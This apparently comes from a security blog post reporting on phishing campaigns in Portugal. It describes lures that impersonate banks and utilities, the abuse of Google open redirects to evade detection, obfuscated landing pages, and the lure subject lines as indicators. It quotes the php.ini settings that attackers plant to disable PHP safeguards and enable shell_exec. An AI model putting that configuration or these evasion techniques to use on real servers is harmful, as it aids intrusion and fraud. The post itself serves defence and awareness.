A new month, a new wave of phishing. Learn here about the email templates recently used by crooks in Portugal and the new trick to bypass detection.

Phishing has been seen as a major challenge over the past two decades and the difficulty to stop it is tremendous, as the onus is always on the user’s side. Email is a notorious trend of spreading malicious campaigns, however, the usage of SMSishing has been widely adopted by criminals as anyone nowadays uses a smart device that malicious content can reach every time.

In Portugal, part of the phishing and malware campaigns have been submitted and classified by 0xSI_f33d – a feed that compiles malicious threats that affect Portuguese citizens. As a result of this work, each quarter a Threat Report is released allowing us to analyze and understand the most affected sectors, the number of phishing and malware samples by numbers and category, and so on. Check below the Threat Report Portugal – Q2 2021.

 

The most popular email templates used by criminals in Portugal

With the start of a new month, users should be aware of the latest or popular phishing models released by criminals to lure victims. Below, we are presenting the templates that impersonate several organizations in Portugal that typically require the payment of an invoice or something within this context.

 

Google’s trigger to avoid detection

If you are thinking the modus operandi of phishing in Portugal remains out-of-date, then you are slightly wrong. Some of the malicious campaigns presented above take advantage of a chain of redirects on Google’s legitimate services to avoid the detection of the malicious URL by network monitoring systems, firewalls, SIEMs, and even malware detection systems like antivirus and EDRs.

By clicking on the URL provided in the body of the malicious email, the victim is led to a redirect mechanism deployed on a compromised website which then directs it to the final landing page (another domain).

This is a behavior that has been observed in recent months and used both for the distribution of phishing campaigns and malware. However, it is interesting to note that in order to make this redirect mechanism less noisy, criminals take advantage of flaws (known as open-redirect) in legitimate Google services until reaching the malicious URL.

 

With this malicious chain in operation, this type of approach proves to be effective when analyzed by threat monitoring systems, as legitimate Google services are used to jump between portals until reaching the target domain under the criminals’ operation. In some cases, a redirector in a compromised website is also used leading the victim to the final URL.

The systems that host the redirector are generally legitimate websites that criminals compromise for malicious purposes. For example, they use a known vulnerability in a website component, or even make use of password-stuffing attacks, to access the website and obtain a remote code execution condition.

For this purpose, it is common to find php.ini files created by criminals and which allow issuing new configurations to the PHP web server at runtime. With this, criminals can, for example, execute code through shell_exec() calls, and also disable security validations.

safe_mode = Off
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF
exec = ON 
shell_exec = ON

 

When the victims’ request is received, it is tested whether the origin IP address is present on a blacklist previously updated by the criminals and also whether the browser agent is within the targets accepted by the system malicious. Below, we are presenting part of the blacklist used by criminals in Portugal.

 

Obfuscation to avoid detection

In order to increase the lifetime of a threat, the landing page’s source code is encoded in JavaScript or also using another encoder e.g., base-64. After decoding the HTML, it is possible to visualize the well-formatted code for a better understanding.

 

But … Is Phishing still a problem?

The short answer is yes, phishing is a growing problem for businesses each day and it requires greater defense – not just for users.

Educate employees and people, in general, is always the right way to provide awareness to fight this threat. Providing education and training around password hygiene, common phishing techniques (identifying spoofing and suspicious messages), and the effects of phishing scams will communicate the importance of email security. But, this is not just a problem for users, organizations need to take in place the most advanced mechanisms to early detect and block potential unwanted/untrusted accesses.

In this sense, keep an eye over the systems, create honeypot accounts to interact with criminals in order to track everything that can be used to identify the guys behind the scene are some of the ideas that can effectively help to track and minimize the impact of this big problem.

 

Take home message

Be proactive and start taking phishing protection seriously!

 

 

Indicators of Compromise (IoCs)

Comunicado Cliente EDP Energia Portugal - FATURA EM ATRASO 1141221/2021
CREDITO AGRICOLA ALERTA - Servico Bloqueado Ative Agora MULTA EUR 147,30. - 
GALP ENERGIA - ATENCAO. TEM 563,72 EUR EM DIVIDA.
Seu aplicativo mudou. Será necessário activar novamente seu registo.
EDP PORTUGAL - Sua fatura EDP expirou, Aviso de Desligamento.
EuroBicNet - Sistema Online de Notificacoes Codigo Utilizador Bloqueado. 
NOVOBANCO INFORMA - Registe seu Dispositivo como seguro, evite cancelamento e multa. 
Millennium bcp: Utilizador desactivado - Telemovel NAO registado, ative agora seu telemovel.

 

References

– Threat Report Portugal – Q2 2021
Cuidado com as fraudes bancárias dos últimos dias: Detetar e proteger-se
Phishing bancário em andamento e tirando partido de falhas open-redirect do Google para evitar deteção